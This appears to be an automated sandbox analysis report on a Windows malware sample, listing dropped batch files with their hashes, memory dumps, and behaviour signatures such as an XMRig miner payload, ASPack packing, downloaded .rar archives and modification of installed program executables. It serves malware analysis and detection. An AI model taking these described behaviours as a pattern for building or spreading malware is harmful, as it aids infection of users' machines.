SHA256 5bf1e1be9e8d92d5ea04c7eea4bc7876b039399bc294731fe86ea37d7eab328b
SHA512 c9039e8363b5d1c66662e45d428bb8b9b2d9dbc366cdaaab7220ce85e13aaf4e8de37dc9219cb04cba24b2f504f0773fc8263d967a80025aefbe7282b82a6765

memory/108-431-0x0000000000FD0000-0x0000000000FD9000-memory.dmp

memory/900-432-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/2192-435-0x0000000000BE0000-0x0000000000BE9000-memory.dmp

memory/2464-439-0x0000000000BE0000-0x0000000000BE9000-memory.dmp

C:\Windows\Temp\0e8d1e9d.bat

MD5 6b9cd54a6e8a7f8a44958b930be56d46
SHA1 28ad8aa8bbb0546f8ad7e56e03cfd6cbb248b32d
SHA256 6c8a2689a0f0de3c52216b81df2d3eb33decf957eb086fe516be66a94f684bcc
SHA512 7e7c023f33b2130751093e264671ef33544d4fb3038807c620e0c436a6b6b6b28fa2ebf8dc399f1e8e4be3aa88d4ad5e2e16aaaf480936a4b9ae9397501e5587

memory/2464-449-0x0000000000BE0000-0x0000000000BE9000-memory.dmp

memory/2192-450-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/2764-452-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/2764-458-0x00000000001E0000-0x00000000001E9000-memory.dmp

memory/2764-457-0x00000000001E0000-0x00000000001E9000-memory.dmp

memory/3028-467-0x00000000001E0000-0x00000000001E9000-memory.dmp

C:\Windows\Temp\5c0c4132.bat

MD5 7e7486d126b4f579518f250405b11b07
SHA1 e0e825b790a83a3bc2141a16e42949cceb2172e7
SHA256 3108a50a2a2e4f11feaef1a14faa58e25a4709dda434d66abedff056c7524854
SHA512 61bfc8134e35747b8ede8054e4356a1014038aed8e3ed70478aa7b13cf3c35f110a452f1d8136cb01f9d30a0a86fb001f5a28e9b2004e832c88855d2cfb4a79f

memory/2764-468-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/2576-475-0x0000000000130000-0x0000000000139000-memory.dmp

memory/2576-474-0x0000000000130000-0x0000000000139000-memory.dmp

C:\Windows\Temp\7f9f23f7.bat

MD5 170889e4f3fba4d0a4d1d68d666942cb
SHA1 490d118116120da1c8ec1df91b748233f5578e5f
SHA256 24527b8e04bc361a9930fc9e63ce111096a13b97ad3228e2f2febeee02db28df
SHA512 3dc2c4de70e3767eb5da8a05b1ec73259850dabc37c0c7faf78f799d699d85b8e2bfe9a4d65172f78ccbebdd0d34f7758678df61b9e96a46f065a15cd0d81706

C:\Windows\Temp\612e0eb6.bat

MD5 c466d597502810590fb441ca39ce5dc4
SHA1 ada903490f0a00977685676e7c63ea23d67100ea
SHA256 12595adafe1bfdae3273c23e09e4b8916228ee37288dfa6ab1f8c5fd54cdbea7
SHA512 024fc1679f98aac1e4bafc6de334e8316b517cf3b92df1f43c9facff579fc04c1e205438c9f7ac8d622c9bec28b92c31fc71310fadc0c23ab23a2ab41d869eae

C:\Windows\Temp\4cc51d8a.bat

MD5 274bc0092e7744c4a810121263d5c358
SHA1 54f0d1f97f2baa7166458d5121e9c2f834a7c83d
SHA256 526500ac83b01124d9de3d1358e93f3a3372186d50212fac26d26fc094165abe
SHA512 4832cb59504d83d24ceb0dd0a6a2b340f7d2c5926e76349351440d658314e988bbb01b0893c7af36fb7664503562ef2a73c5af3229427a3e45914b48493b9818

C:\Windows\Temp\7a602464.bat

MD5 b94db2097e1c9e9b4474a1d2c15d2851
SHA1 6ca94d2d1f0535abdfd75d0d11705e51c3108884
SHA256 4b4161535233811c3b97913c7035fd66685af2b7da5710cd430ff63f097e5851
SHA512 561385dbd02033771c6d31cc51734d8a296dab32dd11a840cae05a1cde6401de5bf5ae41795c1a14fbc2443989416a4a1e5b409b9d3e6cedd38200a593e4b234

C:\Windows\Temp\6bf76741.bat

MD5 5982a9a18446cf7ce0d4265b92594850
SHA1 0d1b2d76536b7a816cb7edfe21a2f38e56b464eb
SHA256 a17b373d15de8eee98ca770d98ff1edade3d5dd6dca7f73e6fc169fd3d202190
SHA512 be8dabbd55574afc8cf186e2cd815f5cc4a5c5f3b8326ecd76ac7a85d03cc007b8d18a2aedd4f457337600e832cdb0b42380437d3b1dc08044c60fb82e309494

memory/2368-559-0x00000000013A0000-0x00000000013A9000-memory.dmp

C:\Windows\Temp\0f8a4a06.bat

MD5 f12fe1ee06abd8cad4de9b5ffb991c2b
SHA1 229666e7e36b49294c1d6e6f9633b6993727c91f
SHA256 3562f19a50d499d294ad4cacffa6e541a2fd499ce8ca5cbca6f4463afbfda530
SHA512 2eed628f1839890864228d97fe87e194a45c200fddbcc4e210bc82b30edb2c4e78ef8a67dfc49f80bf52a0c9b8b049977c6247bc29830e075c23bd5ae5d6f623

C:\Windows\Temp\432604e9.bat

MD5 97c08445ffb06f19817186f63948d4c8
SHA1 6bf8ee8c7079dbe734860155bec6c3c26ee6e3c1
SHA256 79c0af5408b21a62e7fed07cc4cadab1847edda1fdc170de50328417b2324da9
SHA512 0d4d3ab162a9b603f39af03cebf0d6060a37fdea09a671773e7a36e4fcdc786a9a0e8d6dbe93d6f92f3ac374a806db7a3b01bbfe1630cad3fa1259fe162a977b

C:\Windows\Temp\24b56fa8.bat

MD5 7b413cc487cc70c0227ed75769381c5b
SHA1 c13abaa81daa7b675a987c3c0d429e2a4e20314d
SHA256 3798dfe7914db7122a432db0689a094989301bd9bb25accda90bcfbb0f162b11
SHA512 b821cc632cd459c586f2692a277a393b01116ec82c0af58974f4528c9bbcd2b97f9b84503105326970e1c860909dc59a3c1103793368e07c91d63690feff8ed7

C:\Windows\Temp\524f7682.bat

MD5 26f7caa7314536505eb45666890b32da
SHA1 75c794e025cdd15a35419e50cf76ab05b591c9fe
SHA256 87f934d684ef26c6adbd975739a1a51fe7a762fe1f8ef51329e2ce0abc196ade
SHA512 2386753316fdb9183026c6208dc3742196c75b3c1f94cd97df38271b00d83adceb9e720dace6ff44ddddd4072d2e2e4f595ca04c3bd08e1977a7d362f0e6dfb2

C:\Windows\Temp\6bda3532.bat

MD5 d02c3712e971d1bb636f823328b368e0
SHA1 1c96a6d36d9b8ba23b23066e8a4be8dd2e53fc0e
SHA256 8ac8a91a6ae2246ff05626d7750250d4d234cd763c04b112faa25831c0719065
SHA512 725a99166a1655996c893bc0d90ea7b544a7e3d89c52af113807cd29f03a21a579aca224c15a46fcda51efcf3fa2d47275be6b04fdb5127a9729b474e221212c

C:\Windows\Temp\19753c0c.bat

MD5 9cec2570abe86c798b849fcfaa138712
SHA1 79ed8d5e36374864ffc33f31d219974c3e30646e
SHA256 21865eaf55a25fcd5b8720282ba5a4623e1b999c3a3655567723632ee3c67e61
SHA512 4e3227dd0114874ba8752a6ab3429999377ff5c06a6be2ef83bc75e1b5884dad7b33a621b01e27d6bf4f1f6b669f658f671c21b866fc3759ffa7267b1870256d

C:\Windows\Temp\39012ec5.bat

MD5 db46b6f23550a4b82694cfbd276ccec2
SHA1 163dd33d46ab9b23ca46d8ecc9fa06f79c9b9a23
SHA256 a7ba73c344f352e63245b2bf0e1b6cd5db2f2518ce5a5b69eed8d242b0244495
SHA512 0eef3e8006c76c710c2498e7dda7e83377802cfc92a4fb019df6ad0086908a4d5a044d62620f50e04af8aa6078961eb6854d6d359f6b07d2a5bc4eb04f44d244

C:\Windows\Temp\24983d99.bat

MD5 9f59147af19f1c0ab7667ce7b49c0eaf
SHA1 d0965790a4b5a28e9710d52d20394be09c9ace2a
SHA256 f420aed1b64163aeab772c07d55ccc3fdf8db9d91a9f94df41fb2ec14dce5467
SHA512 05abe3c621a3c2836210e0895b4da4957760644ed493d68e758495484a30a59a327fda0f6d18056d4bbaff6cc08ecc15beb198a8867af6f4edb6dc4da3569a9a

C:\Windows\Temp\4e2b5467.bat

MD5 483dbe72fcaa5dc2c079829a1f38e23c
SHA1 28f823dfb16cc4c4d4f81ec283fbd1dadf758000
SHA256 b4bbe92d01d000450e8ada6a84651c31d584125c7c0a83f8efeb046db1139f4b
SHA512 10d43210a5591d58dc7d22d34806594884cd52d9787db4cf458f692404c8814332adab60e39e7c6f78378479b43b26a268f6dc267201733a89ba72e4ccf861f7

C:\Windows\Temp\3dc95347.bat

MD5 e9dbb4a8341a886cdcb3225951d19595
SHA1 dfebb39f36b01c4124a89aacf892cfd2856acfeb
SHA256 b20fce2ead9b160ff1f51108c860fc537d7b49ae2caec978a43f9ffac925dcd8
SHA512 e3d1881a2d35c99b0d87bb7f28bb3534e30ac4d4134323539261004c0b9f2d3e5b2a4255a7dc2c95a27bc36849fcf512c01d2ddaa20f8e667c00dc1ce8ebd3fa

C:\Windows\Temp\5d554600.bat

MD5 b4ffb0da450855ca2b90ea2ffd45fcab
SHA1 ae503855ec0a68fe10b38875eac19c6b2b9ef293
SHA256 3b44d98cd9464a6e5333577fc628d6903194fdc5e6b4732c49c8384a45f7e587
SHA512 0107cc3f384d0b84bcd417afaf3060e6a74917c691bdb67d20f5463d7d1b3387c662864d8f30fd7dfdbefd40fe7bd586ef91c1aff51f275896c38330014fef27

C:\Windows\Temp\0af04cda.bat

MD5 ef735bb765b902ce2a46c8256f9c1281
SHA1 0da3a98bb8cab7c8147096edad7e86493fcfbedf
SHA256 e0703bcd363a1c0b2ca45d59fc9d0e3900d5a94e462910c04c5a6dcfbc38d707
SHA512 55fecefe8dd3b27d5a0dae6ad7187e350ba04a19a1b08f520dd724b5f5b6fb2a4ca571dac4cd4988a7df89a6f8bca44ffc637f93b9352ecb200fee91a00d7f50

C:\Windows\Temp\6c7f3799.bat

MD5 0c922202418936c59e438456077b1cfe
SHA1 491bd6df4bffaa944c4b676428f4537d90e92b30
SHA256 1552da3dba876825b69f95e68a49d6c73b4ed9a9ee862d9c5f6f659093fc9d05
SHA512 fb522e0ec3e9f5b97a4746372a91855dcfa325d1c4254522e0510f72323f80cb9b77e8c3eb983d976f5ecbfb22e71225f9131c884d2f096d514306efc41e31de

C:\Windows\Temp\621e6a82.bat

MD5 b7c768cf210ce5f9c1a68164559e0768
SHA1 765134698445864afda694880d9eaa5db9e195e0
SHA256 22b5542db74ae0243760fdde67233a5b693c3afa7b1384d36968dec13afbb318
SHA512 ce0c7e476e48f00275518a4299f56845894a429e73fa20481e5c478fa9051d85f127dbd5f45353109cdfc47e6511728f9e89dea77f429e9e3f22a4d3dbdc110b

C:\Windows\Temp\49ae094a.bat

MD5 8ce136f3db9002139edbdbe3d28ce49a
SHA1 72977c5a3d128b63939216232e95278ccf8c337a
SHA256 954cbaee82c61e8c002a5982d9887ab79c1fed1c5cc8c8cf408850677602dc2e
SHA512 b7f3afede67a45a3b0372265b4aa75caec09fe2478beeee645cd747eb8e44d567b191b94533787104a5cc79c4fc6b08aa6b8f4b7531fb506b1f29fc96dfcd3fd

C:\Windows\Temp\394c082a.bat

MD5 e53adad312d6b60c6104ba464c5628bc
SHA1 3da2e72d81940ddaf0ecc2075a4690b623c8410e
SHA256 c9eede2b905b345c0467658fb5e8629721a2c862cf81a553bbe0ccf9fd33d22a
SHA512 1be2ffdb49dc3ff0c040c5f1424fae79a3129dc84b67c22af8ac8bebf2a4b7e2a1644f0536eed63f74c10185cd1ae7450ba040d35b14a3ae9c22cbb4279d2ee7

C:\Windows\Temp\10d34ed4.bat

MD5 da572d83ef38caddd3bbdb7aa1d05101
SHA1 e1ad02e6635c055da96e73672e3325783b1b85b0
SHA256 1efe76c36741dee0d634dc27be75fb3407c7a19cc7b2358f4c08df0b76dbde45
SHA512 cacc5bde00fd7cdd83ac4477b90c0eb38a7fd82d1ee53e0260c8a58e58c0d8950dba7e09b944caea9be7ee4dd117ac27b31760231793c898e4c3c5031c5ef7e1

C:\Windows\Temp\026b11b1.bat

MD5 e2da1b451ba7bbf6ed09a258f382229a
SHA1 85eb0b3ba16f17e906f2e6acdfbc1b59dd18b159
SHA256 c0f020b4b05dc6b407b66b33d5a58cc1ace1b5e7d2b27558f17334eaaff833eb
SHA512 f4823c6b81ed9b3b93811f947e4e1734761530d6b0c2875cd1de62a7d9c54d9523f75b7f078b5e236b3266564d44b660d9007dee5df694d4cc8dc18c8105dc3c

C:\Windows\Temp\15f51c58.bat

MD5 e51de0901bf01855195ef80a447f6773
SHA1 dd0b426c13c5bdbd2b48d9d9a588034a8c69631d
SHA256 dad4a3a84edb917c72df1918ab7d6360132b89556c92891b8f0c63bf09c89eb4
SHA512 2fc9132694b09644f73897bd85010c6c2bc69642af983fd432409ba58a9ad03196282c27994a164507ec28e783be1b05b4865f512587712ac376c8cfc107c5ba

C:\Windows\Temp\018c2b2c.bat

MD5 906b11d5a587bfe785870fd55b1fb108
SHA1 f41695dfeb306c76d5eca8b4d94442c35086bff9
SHA256 cf413c91c96fbbd8f305ce495c9a1d1ba07a29200977e6373c36e42a9b93d887
SHA512 6e0d018e37728656e8a8fc81896ad7ab047f586d0d1318c44723ffc6016fbc22b6040e77329038446a255baa1b4a3d5d7c47d9cdf43a44b0f3930f3bfe31da4f

C:\Windows\Temp\631b15eb.bat

MD5 212e653ac0a9a9cf8a1c8acb206e4911
SHA1 cb4563d3d136c4ed506f72bf5979c8181d93ead2
SHA256 bb67d1fbe3f3d06c0c321f181b1b4eb5e7b00c9aecdfc01e1ec7d692b86f6f5d
SHA512 5c46982065b5b489c2aecff068b1347e25a6a72b6ee0542080db2be0e405517ed010050a48d109a27293a5d89c3feae560a890fd66e45456d13172e981fed3cc

C:\Windows\Temp\54b358c8.bat

MD5 d4c8c84eb6a6fc74334b2a57cd40454a
SHA1 2a2e534a9effe33691d0bb008072971be0bebca7
SHA256 e2685c4b31be563e98ddd6db74b81de0e6bdd5bbc6b29da54f22e8a48315646b
SHA512 4ead7228573d17b3ac5805afeef10a6a58d95c2ff79c27bb95b767132c93a199f29aff3c88e21eab9577ca6689da1ba25dbf33773af9ae3f5baa87bd9e44b02c

C:\Windows\Temp\6e3e1778.bat

MD5 5be312ba79aac298722cbf119f2dbe5c
SHA1 f49bf7f195956a5683201fe8d5c33ea342482a93
SHA256 f9cffe74960810f7761b80a25f59d84f00b479ccb8d0884224c96179352a231e
SHA512 6e10b5cf2bad0ed8693a95c835f3e923cc07b44e83c40ba6132b8809e7848c5149d322e9db27e53b37365d41611712c7eeed61884fe27ad7677d1a65fd1a86f5

C:\Windows\Temp\1bd91e52.bat

MD5 99903e1982b301ec7a0562a4dcecca2b
SHA1 6ec8e1e01ccb796372e5c1fa33735e4b7e72a14e
SHA256 85ff2085d71074b027c0d45fef118810fc3318a245e6d2a5c41f83b7e311f107
SHA512 3522bb86f0301fe7a7d05246aa1b00864dd9bb4a5cee6c4fde389a7c8ea88410f56b0865645b0c3b828a8d2412df8c027dbdd9b51b413a9762aa1aa587406ff0

C:\Windows\Temp\7d680911.bat

MD5 38291868d2c24a5237935f2c45a88600
SHA1 3c0ac2b41386a9bb7d47213f192e211db01b4632
SHA256 6808f9d632176c7aae974fe4ec75530c29ae350911210a9d27e65cd30ed6ae96
SHA512 80e1af92a006e6f83c7045c13715fbdafc7e0c985944a1df91a160200e3e263bec36fd2932201649a0ab8b4150dd356ad62c6b1eacc4485ea496ad9929cb610e

C:\Windows\Temp\2b020feb.bat

MD5 44c787e440246eb7a781622f44ce201f
SHA1 988b585c95d1e757b07a33c1006e1ea0ce7cffc1
SHA256 32e91ef31a6be7aeb5ef7a0b50ac57a0b71d855fb572cbe62095d2215b720f32
SHA512 1f7b4ff17329372998d28a156c70ff17d9def05aef902d284ca0cefd23bf7bd762b5c2c49f25cd3024cad8baca582bc4b87a771af134c7f95c820f1a474b3a56

C:\Windows\Temp\1c9a52c8.bat

MD5 8f1d7083b5b088d2d7e95a3e9680c751
SHA1 c481bb3d6e99ed6efce2efacb686fb81041a87b7
SHA256 d9a0e794bc8937e729c152185cafd7636ceaa2a0cc3c3351a41d7b4f863960fb
SHA512 dd0da5ca456d7acb6aa27cae72e75c48ea4b86603bc987c34cbf76ec2a01b81dc7e97374cc102ad59d560931ecd42d9c6dd834015967a4639fe97662d06362c9

C:\Windows\Temp\4a3559a2.bat

MD5 21c3e2daad315653c1feae4d21724d13
SHA1 c3e5627ea1cb3dc56f5b73aa56d6256166a07148
SHA256 0b291752d6869af39107412b1097b0a7ea9472f3e8ebd467e8ceba2202b2e037
SHA512 c93734580f43d32e242c2882b32121e613e8eaab3b71d3d28869e5530d5396288d685fcd587b955f38eabc297999553efe82815db2704f62e8ca681b556cc3ae

C:\Windows\Temp\7dd01485.bat

MD5 2ca7ce052d8641a8b2c37615fd9ff034
SHA1 7aa1dcd35814e1c28843abb76e4bda299655819d
SHA256 8404456f0ebe41327a19ff6397d5da8dc43ef89b3e39130039b74f88b52f92cd
SHA512 5e1bf9aac66e2cdb7a14e59e196f17b560fbfeb1a177f09031b0f5265468b52a00bf675edd7eb6357b61a3e9a175f23de51b416ce39bbb7fdda6e474fd49f343

C:\Windows\Temp\27642b53.bat

MD5 139f167a01526eec033f768169e1a712
SHA1 ef3c365440cb93e17045bf19ca94fdbb5ded5035
SHA256 2b38acf1a85fdf049320eac23006db8cae3bca2b03ba03e48054e45fb4d144e4
SHA512 09eff06c2385d99c2bb01a059e194d7a7e8e0e7a9da9962d5cc5c7cb9cd8ae84559be564b22ef377a3037abebeaa19c9b288420dd2649340806e635e07f7b677

C:\Windows\Temp\02f26209.bat

MD5 f857c394a82f0ea716c4f0448a61204b
SHA1 9612671a8c2160864897126edb2779b348f4e275
SHA256 0c536ebaa07bd737e60a865e753fbeb812582da8dd183f06d8daf4cb1a27b3d8
SHA512 54fd00a5f389a8f5e5877cf866864a44472489009813b54fa8d03661751b13e3341c6129e88cfa768bb20f61ea26d25786e31dc55cf4750b3c2c7d5897db3a6c

C:\Windows\Temp\748a24e6.bat

MD5 87c57c03a63eb6833a4ff99f3f5d75b1
SHA1 ba7e230450ee8d2738d6bdf5f26e3f3d419b32f0
SHA256 0b8412ec26c117708633409621b806e5f66d3814922330a297007542ebcf2b0b
SHA512 4d087c1959449d8b7aa02108aaa801a0e7116d5b828ef4237153dde4aff2dfb69baf8b9b49a0935b8c9898c1cef9eacec6bf812b33f04eae332d1b2aa0435a50

memory/1396-1159-0x00000000003C0000-0x00000000003C9000-memory.dmp

C:\Windows\Temp\121c53a2.bat

MD5 84a751f04db49e08aa7da6eb53ffbe7a
SHA1 e166c182e9861c6c81b4f0d8a28cbaf31420d545
SHA256 1fed4646c4726c16a17fbce3d3329f7f4bef9b450279d6d8d4c3b934fe07509d
SHA512 ed1149a0bb06e6565f76b1504cf799ab7fe897b84be13116b487e86fda782ae87753b4d00716acc1497c28b5259ad359a82599a06ff13278763040b1a42e401a

C:\Windows\Temp\03b4167f.bat

MD5 4af6214d27b6e3f4cfe1a43d77747d95
SHA1 cf4bf3c7a62feed207ce3b4e839bc12e6c381f75
SHA256 1650d6c30cea47c14e7db38e8332ac78d2410ce933f2978825a44d40be218277
SHA512 9b5a6bded10f3325d66797a0fbd5f8fcac298d6d7a547d80bbfe68383571ed6048113502a194ac43989b457e8da7fad150a3295b418dd546092132d1adfd4221

C:\Windows\Temp\5b3b5d29.bat

MD5 08bae4881d4f44ef982cab5ec07119f4
SHA1 3c585c9d92c3d5613eacc41d623b90298c68718e
SHA256 2fafcb5a7e98c83a7c2de75f77107d9aafa1a1d5bdae3957693074457a05d44d
SHA512 beb14f492ac863ef250e1fb62e44a8be14efc467712d7f74ab231954179aff2e12959b81ef0278fb9a1a331e731d8dbf53f33af694c86ae1641085d18deb6dcd

C:\Windows\Temp\4ad95c09.bat

MD5 080daf9b6e2b960f3434066f860f62ea
SHA1 4c0606f75aa816c2401029f5c103de197a6e70d1
SHA256 6875b1ce6652df2cacf33bbdb4e2e030eff31e9ca911229969107a5adf6124cb
SHA512 406bc5ae7952057f5ce2d1f0457cdd9201ffe795b218c162b3b17f3461524765db6413fe10f9439216788e48a5396cd96b6f832a59043465be456f9b3faf2d4f

C:\Windows\Temp\6a654ec2.bat

MD5 1e09287606e2a6165237058a4083e78c
SHA1 7fdf2b3723c9e0e9e8d5930b27c0d9f37de8452b
SHA256 f2aa4e08332740bb189e811dc31521b3da40f6a40f259d62d5b5faedbba6b1fe
SHA512 74b61193ddbdae56da5055d1eb3a3ccdadc887b4f433ccedc28fdb95b87260320676878c64d042eaeab956f5dc490de5f1895eb2efa5cf870ac4680a69ba656b

C:\Windows\Temp\1e0009a5.bat

MD5 c88b7f626868f093fb5c5e737c5745bb
SHA1 1cecc6acb7f9919f3c4fe0e64593538b806c9005
SHA256 53d855e0c135474b55e390ae328f2382653674e6ccae7c22ca310c08f9479d1f
SHA512 09fdc05577ea9274817320fbdf7f5ee8982d5bd3f6d07e7d9e7c4d99e33e1159022ba5a74646ed6d34936243ff41f0f191491214f7895321a8938db457d6f572

C:\Windows\Temp\378b4855.bat

MD5 efc390547a3c77c36144c6793d0220ab
SHA1 ee6e2f943ef0202df816cbf88b201bd6fabb68b8
SHA256 132d09b37eb4989419571878b4073338cf20b557def337a85fdfad5483981f14
SHA512 04b7e7df637a12f5ed8b91a1258fb2fdd442ab3f4843f1f88296c101ec0945cf0e7125789ea96bad9a1011b7e33d5ded839d9c64b6be81341c023a72aa0f70fa

C:\Windows\Temp\65264f2f.bat

MD5 fc1005980086986ef2781abd814d3169
SHA1 6249e4e437c53d2a1e07446956337a5c00463f81
SHA256 9fe6ca9b7afe469a9d82d356b0f4e7c875ce353675a113390d42c63185a311a1
SHA512 194ddc3ea280dd24a0ada599090516a5c9b7446db4fae6283a94b9dffd2447efbf897a67194eba05e44e63a33dfd44be097cd45555444151c7965d39ab4f3212

C:\Windows\Temp\0eb965fd.bat

MD5 c3e86b6c871c5dabf6c6593b242740c7
SHA1 a2730470af728b48360f1e0578f4064bc7cbbce7
SHA256 fb076f7ed14e93d73e4ac85c055e3c45b8912ecde95df4feb58db169899b3302
SHA512 af74fff9a3a679c1b97f04fc1e9e80d46b489db3224082184ffd67d101792fde4c3ec425e216f305e1260fd55f486371c1f16d104f162c6caea624397c6a680b

C:\Windows\Temp\3c546cd7.bat

MD5 95c20e474c1615de9c26431e211e2ac9
SHA1 a51e98e34b3df9bdc91a9777529c1fbdda20ef18
SHA256 0cf374570eac117ae856cad74a6ffc50d968d946727c01c2e6ad1b3f59836eb5
SHA512 86fc9df3d6160455cef2da4336c0af2b00ff63af57f272f7022173c1141c9ca4a87e828a93d746b6d3d37a197ba095137ab92725cf4e7c459925bc70ca44d894

C:\Windows\Temp\23e40b9f.bat

MD5 42ebaa70ae6ed6f7e554dbcc55c035f0
SHA1 38e518d8ccf837e7f058feadf02baf47947db21e
SHA256 d33b667f53052b5c6a7e1abb63f2ae23a89f7d709f42ced7f457816537831fb4
SHA512 099199b9f2bfe1674f5bd24d334a4efd5f250f63a46227d872824c987b75bfc5871648306bacc0df057e5cda7775e0e06bd5ab1432b2e34ec3a12212a62c7224

C:\Windows\Temp\13820a7f.bat

MD5 997707b0fc3254dde16fd9c7db705cff
SHA1 b57f10716b56fcc26fef52c7f9bb8eb1f0dc2636
SHA256 0102d7d74a148e6a1955627295d6bf558c5546d81bc9858f0fc9ca64b6785eab
SHA512 195a106aa2e0b5d34420d9394d9fca5e181c7f0c8f9da13e3f881f8b08fd9f44d667c4cd2603dbc88b2a7eab115a4616065c2fa8f23e3f0c39e9bbda31c48417

C:\Windows\Temp\7511753e.bat

MD5 73e2b3439ac115e0b1ca1625bfb2d5c2
SHA1 fc2fb66c06717b4dc52560a70f274b8c9590e01c
SHA256 5a9b78bc1f458f1ddfcd3e857c6aa7dc6cdf636abae220f2ecf6545a490bb79c
SHA512 a0e39c32b73ad1db6cbf0dd1e375893e9f25d5b270cdfe249f32200b4800d5f0a85670a6de2c1b63bb343f10b24fdbd046b3a5f8c638fb0d7426abea6180eaca

C:\Windows\Temp\66a9381b.bat

MD5 f3a36318adbda54b4763878961257bfd
SHA1 2c9c69caa14079a8ffe23a2b6431e100297934ff
SHA256 7466633c74c489cc80d311281166eaf1bed09f760002c6f2b4599fa9e24cfbf7
SHA512 c02ade2419944873ca85862d0e8eda5bcbfcb20b2c4dd5091707dad4980f54fe26d194bc3d722277a9b5973d9bf761b8c95204ca4871190161d9c590ae120ef1

C:\Windows\Temp\14443ef5.bat

MD5 74ff3bcd676046201ffe7bdcaac525e2
SHA1 4d62f876d1609cc16c30b63b07d772fba4515411
SHA256 da8830195a0936e094906033050afebdae9966a8b29fbcbc6bd27e79adabca66
SHA512 e6cfa83866ee84f84a74e654411d9bf0f172f53e42c173221e24f60d8703435e903c84262432bd9853743fb33257ecf0038e1608ebb502b41fe76f6653a45ef9

C:\Windows\Temp\7fdb4dc9.bat

MD5 daeedcbc34387154689ca710f3714edf
SHA1 ddbdb50c8e143759be8bb25b4afeb32d23405236
SHA256 129c195d56a156e0b232d55ab9ab6c628026c51d4787e8d2a37bd66d2676869a
SHA512 3d8d43294942d6699c3fee0d44d393d22b850d98272a0966ce2e4c70893438270c43bea8cfde36b936201731ce1aaab32143cd53d98b597b05777bca723b6c2d

C:\Windows\Temp\19660c79.bat

MD5 e407e7201f4cc1a9f30382483164925f
SHA1 5764bf08a650ed15b78f621edc992cc0d99deee4
SHA256 763df87334a835465d6d856c211c995c23a7c087e554b9c440f3b558a3783308
SHA512 c4947fd45c048c5dba827299483591306a7d6e023cf6dca5addff559a73f64b74d342f7f805006f1ae90012492f4f3d2ee1690efd5d8d5d3da6462561b521222

C:\Windows\Temp\4d01475c.bat

MD5 c67bab3dd01e3344fc3782868e9e438f
SHA1 d3e99904c5865063206de6716024a88e2d7b9fbb
SHA256 432313fd5484cd17f83e67f07a6f319707a496808988fd59e7e61808b7b4e09d
SHA512 4ea1d3440db46fff4687503304d4e823db2eaca19eec72ca180566f34efe7693ba6f7651b0b5b919f97019d068f9f88f08dc8c6dd5ea7f1ca437da9fcc352b87

C:\Windows\Temp\009c023f.bat

MD5 78f471eb1fe3bc1ee966b8e66546fff4
SHA1 99dbb9c36b48ff372a872eecfd5b59b2b329b4a3
SHA256 025cd42f7b632fa9b88d82a6aa9cbb867f62184da08f4df66cf350bbd750b1d6
SHA512 8f6c60ba573d6e5268cda5374f249c6fe20d9c8898b4f55213aacaf40be606efdb28c7bc760ae4e6aef8699a97b2b2b2b0c2f80572c5e3d5de97be46333dd58e

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-18 18:51

Reported

2024-05-18 18:53

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5646516f9069627c54a3878c3af85286_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k1[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k5[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k2[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k3[1].rar C:\Windows\TEMP\aEHvt.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k4[1].rar C:\Windows\TEMP\aEHvt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\policytool.exe C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE C:\Windows\TEMP\aEHvt.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE C:\Users\Admin\AppData\Local\Temp\aEHvt.exe N/A
